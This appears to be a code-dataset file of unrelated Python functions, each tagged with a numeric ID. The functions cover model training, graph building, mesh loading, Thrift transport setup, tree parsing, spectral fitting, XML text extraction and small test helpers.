def train(epoch, train_loader, model, contrast, criterion_l, criterion_ab, optimizer, opt): """ one epoch training """ model.train() contrast.train() batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() l_loss_meter = AverageMeter() ab_loss_meter = AverageMeter() l_prob_meter = AverageMeter() ab_prob_meter = AverageMeter() end = time.time() for idx, (inputs, index) in enumerate(train_loader): data_time.update(time.time() - end) # l, ab = inputs['rgb'], inputs['rgb'] l, ab = inputs['rgb'], inputs['dep'] label = inputs['label'] bsz = l.size(0) l = l.float() ab = ab.float() if torch.cuda.is_available(): index = index.cuda() l = l.cuda() ab = ab.cuda() # ===================forward===================== feat_l, feat_ab = model(l, ab) # [bs, 128] # print (feat_l.size()) # print (feat_ab.size()) out_l, out_ab = contrast(feat_l, feat_ab, index) l_loss = criterion_l(out_l) ab_loss = criterion_ab(out_ab) l_prob = out_l[:, 0].mean() ab_prob = out_ab[:, 0].mean() loss = l_loss + ab_loss # ===================backward===================== optimizer.zero_grad() if opt.amp: with amp.scale_loss(loss, optimizer) as scaled_loss: scaled_loss.backward() else: loss.backward() # torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1e-4, norm_type=2.0) optimizer.step() # ===================meters===================== losses.update(loss.item(), bsz) l_loss_meter.update(l_loss.item(), bsz) l_prob_meter.update(l_prob.item(), bsz) ab_loss_meter.update(ab_loss.item(), bsz) ab_prob_meter.update(ab_prob.item(), bsz) torch.cuda.synchronize() batch_time.update(time.time() - end) end = time.time() # print info if (idx + 1) % opt.print_freq == 0: print('Train: [{0}][{1}/{2}]\t' # 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t' # 'DT {data_time.val:.3f} ({data_time.avg:.3f})\t' 'loss {loss.val:.3f} ({loss.avg:.3f})\t' 'l_p {lprobs.val:.3f} ({lprobs.avg:.3f})\t' 'ab_p {abprobs.val:.3f} ({abprobs.avg:.3f})'.format( epoch, idx + 1, len(train_loader), batch_time=batch_time, data_time=data_time, loss=losses, lprobs=l_prob_meter, abprobs=ab_prob_meter)) # print(out_l.shape) sys.stdout.flush() return l_loss_meter.avg, l_prob_meter.avg, ab_loss_meter.avg, ab_prob_meter.avg
5,348,687
def create_issue_digraph(epics_stories): """Return a graph representation of all issues. Blocking dependencies are modelled as graph edges. """ log.info('creating graph...') graph = nx.DiGraph() for epic, stories in epics_stories.items(): for issue in stories: graph.add_node(issue.id, issue=issue, epic=epic) for issue in itertools.chain(*epics_stories.values()): for target_issue_id in get_blocked_keys(issue): if target_issue_id not in graph.nodes: log.warning( f'issue {issue.key} blocks unknown issue {target_issue_id}') continue graph.add_edge(issue.id, target_issue_id) if not nx.is_directed_acyclic_graph(graph): log.error('graph has at least one cycle: {}'. format(nx.find_cycle(graph))) sys.exit(1) return graph
5,348,688
def loadmesh(basedirMesh, ptcode=None, meshname=None, invertZ=True, fname=None):
    """ Load Mesh object, flip z and return Mesh
    meshname includes ctcode
    """
    if fname is None:
        try:
            mesh = vv.meshRead(os.path.join(basedirMesh, ptcode, meshname))
        except FileNotFoundError:
            mesh = vv.meshRead(os.path.join(basedirMesh, meshname))
    else:
        try:
            mesh = vv.meshRead(os.path.join(basedirMesh, ptcode, fname))
        except FileNotFoundError:
            mesh = vv.meshRead(os.path.join(basedirMesh, fname))
    if invertZ:
        # z is negative, must be flipped to match dicom orientation CT data
        mesh._vertices[:, -1] *= -1
    return mesh
5,348,689
def get_transport(socket, host, kerberos_service_name, auth_mechanism='NOSASL', user=None, password=None): """ Creates a new Thrift Transport using the specified auth_mechanism. Supported auth_mechanisms are: - None or 'NOSASL' - returns simple buffered transport (default) - 'PLAIN' - returns a SASL transport with the PLAIN mechanism - 'GSSAPI' - returns a SASL transport with the GSSAPI mechanism """ log.debug('get_transport: socket=%s host=%s kerberos_service_name=%s ' 'auth_mechanism=%s user=%s password=fuggetaboutit', socket, host, kerberos_service_name, auth_mechanism, user) if auth_mechanism == 'NOSASL': return TBufferedTransport(socket) # Set defaults for PLAIN SASL / LDAP connections. if auth_mechanism in ['LDAP', 'PLAIN']: if user is None: user = getpass.getuser() log.debug('get_transport: user=%s', user) if password is None: if auth_mechanism == 'LDAP': password = '' else: # PLAIN always requires a password for HS2. password = 'password' log.debug('get_transport: password=%s', password) auth_mechanism = 'PLAIN' # sasl doesn't know mechanism LDAP # Initializes a sasl client from thrift_sasl import TSaslClientTransport try: import sasl # pylint: disable=import-error def sasl_factory(): sasl_client = sasl.Client() sasl_client.setAttr('host', host) sasl_client.setAttr('service', kerberos_service_name) if auth_mechanism.upper() in ['PLAIN', 'LDAP']: sasl_client.setAttr('username', user) sasl_client.setAttr('password', password) sasl_client.init() return sasl_client except ImportError: log.warn("Unable to import 'sasl'. Fallback to 'puresasl'.") from impala.sasl_compat import PureSASLClient def sasl_factory(): return PureSASLClient(host, username=user, password=password, service=kerberos_service_name) return TSaslClientTransport(sasl_factory, auth_mechanism, socket)
5,348,690
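A hypothetical connection sketch for get_transport above using the plain buffered (NOSASL) path; the host and port are placeholders, not values from the source.

from thrift.transport.TSocket import TSocket

sock = TSocket('impala-host.example.com', 21050)
transport = get_transport(sock, 'impala-host.example.com',
                          kerberos_service_name='impala', auth_mechanism='NOSASL')
transport.open()
# ... issue Thrift RPCs over `transport` ...
transport.close()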
def _read_node( data, pos, md_total ):
    """
    Example input: 2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2

    Each node consists of:
    - The quantity of child nodes.
    - The quantity of metadata entries.
    - Zero or more child nodes (as specified in the header).
    - The metadata entries (as specified in the header).
    """
    child_count = data[ pos ]
    pos += 1
    md_count = data[ pos ]
    pos += 1
    for i in range( child_count ):
        pos, md_total = _read_node( data, pos, md_total )
    for m in range( md_count ):
        md_total += data[ pos ]
        pos += 1
    return ( pos, md_total )
5,348,691
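Running _read_node on the sample tree from its docstring sums every metadata entry in the tree:

data = [2, 3, 0, 3, 10, 11, 12, 1, 1, 0, 1, 99, 2, 1, 1, 2]
pos, md_total = _read_node(data, 0, 0)
print(md_total)  # 138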
def _large_flag_fit(x, yDat, yFit, initz, speciesDict, minSize, errBound): """ Attempts to more robustly fit saturated lyman alpha regions that have not converged to satisfactory fits using the standard tools. Uses a preselected sample of a wide range of initial parameter guesses designed to fit saturated lines (see get_test_lines). **Parameters** :x: (N) ndarray array of wavelength :ydat: (N) ndarray array of desired flux profile to be fitted for the wavelength space given by x. Same size as x. :yFit: (N) ndarray array of flux profile fitted for the wavelength space given by x already. Same size as x. :initz: float redshift to try putting first line at (maximum absorption for region) :speciesDict: dictionary dictionary containing all relevant parameters needed to create an absorption line of a given species (f,Gamma,lambda0) as well as max and min values for parameters to be fit :minsize: float minimum absorption allowed for a line to still count as a line given in normalized flux (ie: for minSize=.9, only lines with minimum flux less than .9 will be fitted) :errbound: float maximum total error allowed for an acceptable fit **Returns** :bestP: (3,) ndarray array of best parameters if a good enough fit is found in the form [[N1,b1,z1], [N2,b2,z2],...] """ #Set up some initial line guesses lineTests = _get_test_lines(initz) #Keep track of the lowest achieved error bestError = 1000 #Iterate through test line guesses for initLines in lineTests: if initLines[1,0]==0: initLines = np.delete(initLines,1,axis=0) #Do fitting with initLines as first guess linesP,flag=_complex_fit(x,yDat,yFit,initz, minSize,errBound,speciesDict,initP=initLines) #Find error of last fit yNewFit=_gen_flux_lines(x,linesP,speciesDict) dif = yFit*yNewFit-yDat errSq=sum(dif**2) #If error lower, keep track of the lines used to make that fit if errSq < bestError: bestError = errSq bestP = linesP if bestError>10*errBound*len(x): return [] else: return bestP
5,348,692
def mse_large_arrays_masked(dataA: 'LargeArray', dataB: 'LargeArray', mask: 'LargeArray', dtype: Type,
                            batchSizeFlat=1e8):
    """
    Compute MSE between two HDF datasets, considering elements where the mask is set to true (one).
    Computation is performed in batches to decrease memory requirements.
    """
    if dataA.shape != dataB.shape or dataA.shape != mask.shape:
        raise ValueError("Arguments should have equal shapes, {}, {} and {} given."
                         .format(dataA.shape, dataB.shape, mask.shape))

    # accumulate in 'total' to avoid shadowing the built-in sum()
    total = 0.0
    count = 0
    for batchStart, batchEnd in get_batch_indices(dataA.shape, dtype, batchSizeFlat):
        batchMask = mask[batchStart:batchEnd]
        diff = batchMask * (dataA[batchStart:batchEnd].astype(dtype) - dataB[batchStart:batchEnd].astype(dtype))
        square = np.square(diff)
        nonzeroNumber = np.count_nonzero(batchMask)
        total += np.sum(square)
        count += nonzeroNumber

    return total / count if count > 0 else float('nan')
5,348,693
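A small usage sketch for mse_large_arrays_masked with plain in-memory numpy arrays, which expose the same slicing interface as HDF5 datasets; it assumes the module's get_batch_indices helper is importable alongside the function.

import numpy as np

a = np.zeros((100, 10), dtype=np.float32)
b = np.ones((100, 10), dtype=np.float32)
mask = np.zeros((100, 10), dtype=bool)
mask[:50] = True                                        # only the first half contributes
print(mse_large_arrays_masked(a, b, mask, np.float64))  # 1.0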
def test_shell_cmd_inputs_1(): """additional input with provided position""" my_input_spec = SpecInfo( name="Input", fields=[ ( "inpA", attr.ib( type=str, metadata={"position": 1, "help_string": "inp1", "argstr": ""}, ), ) ], bases=(ShellSpec,), ) shelly = ShellCommandTask( executable="executable", args="arg", inpA="inp1", input_spec=my_input_spec ) assert shelly.cmdline == "executable inp1 arg"
5,348,694
def xml_elem_or_str_to_text(elem_or_xmlstr, default_return=""): """ Return string with all tags stripped out from either etree element or xml marked up string If string is empty or None, return the default_return >>> root = etree.fromstring(test_xml) >>> xml_elem_or_str_to_text(test_xml, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> xml_elem_or_str_to_text(root, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> root = etree.fromstring("<myxml>this <b>is <i>really</i><empty/></b> xml.</myxml>", None) #mixed content element >>> xml_elem_or_str_to_text(root, None) 'this is really xml.' >>> isinstance(xml_elem_or_str_to_text(root, None), str) # make sure it's string True >>> xml_elem_or_str_to_text(xml_xpath_return_textsingleton(root, "pxxx", ""), None) """ ret_val = default_return if elem_or_xmlstr is None or elem_or_xmlstr == "": ret_val = default_return elif isinstance(elem_or_xmlstr, lxml.etree._ElementUnicodeResult): ret_val = "%s" % elem_or_xmlstr # convert to string # just in case the caller sent a string. else: try: if isinstance(elem_or_xmlstr, str): parser = lxml.etree.XMLParser(encoding='utf-8', recover=True) elem = etree.fromstring(elem_or_xmlstr.encode("utf8"), parser) else: elem = copy.copy(elem_or_xmlstr) # etree will otherwise change calling parm elem_or_xmlstr when stripping except Exception as err: logger.error(err) ret_val = default_return try: etree.strip_tags(elem, '*') inner_text = elem.text if inner_text: ret_val = inner_text.strip() else: ret_val = default_return except Exception as err: logger.error("xmlElemOrStrToText: ", err) ret_val = default_return if ret_val == "": ret_val = default_return return ret_val
5,348,695
def sequence_equals(sequence1, sequence2): """ Inspired by django's self.assertSequenceEquals Useful for comparing lists with querysets and similar situations where simple == fails because of different type. """ assert len(sequence1) == len(sequence2), (len(sequence1), len(sequence2)) for item_from_s1, item_from_s2 in zip(sequence1, sequence2): assert item_from_s1 == item_from_s2, (item_from_s1, item_from_s2) return True
5,348,696
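A quick illustration of sequence_equals comparing sequences of different types, which is exactly where a plain == would fail:

assert sequence_equals([1, 2, 3], (1, 2, 3))
assert sequence_equals(['a', 'b'], ['a', 'b'])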
def test_load_external(): """ This function tests if a model that has been trained on a different computer can be loaded and used on a different computer. """ x = np.linspace(-10.0, 10.0, 2000) y = x ** 2 x = np.reshape(x, (x.shape[0], 1)) estimator = MRMP() estimator.load_nn("saved_model") score_after_loading = estimator.score(x, y) score_on_other_machine = -24.101043 assert np.isclose(score_after_loading, score_on_other_machine)
5,348,697
def create_or_update_user_profile(sender, instance, created, **kwargs): """If the User is being created and does not have a UserProfile model, create one.""" if created or not hasattr(instance, 'userprofile'): UserProfile.objects.create(user=instance) instance.profile.save()
5,348,698
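A hypothetical wiring sketch: a handler like create_or_update_user_profile is typically connected to the User post_save signal, e.g. in the app's signals module.

from django.contrib.auth.models import User
from django.db.models.signals import post_save

post_save.connect(create_or_update_user_profile, sender=User)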
def extract_parameters_by_usrDict(preModel, preDict, usrModel, usrDict, paraDim):
    """
    Extract desired parameters from a pretrained embedding model
    based on user dictionary
    """
    if paraDim not in [32, 64, 128, 256]:
        raise RuntimeError("We only support 32, 64, 128, 256 dimensions now")

    fi = open(preModel, "rb")
    fo = open(usrModel, "wb")

    # write filehead
    rowIndex = get_row_index(preDict, usrDict)
    newHead = struct.pack("iil", 0, 4, len(rowIndex) * paraDim)
    fo.write(newHead)
    bytes = 4 * paraDim
    for i in range(0, len(rowIndex)):
        # find the absolute position of input file
        fi.seek(rowIndex[i] * bytes + 16, 0)
        fo.write(fi.read(bytes))
    print("extract parameters finished, total", len(rowIndex), "lines")
    fi.close()
    fo.close()
5,348,699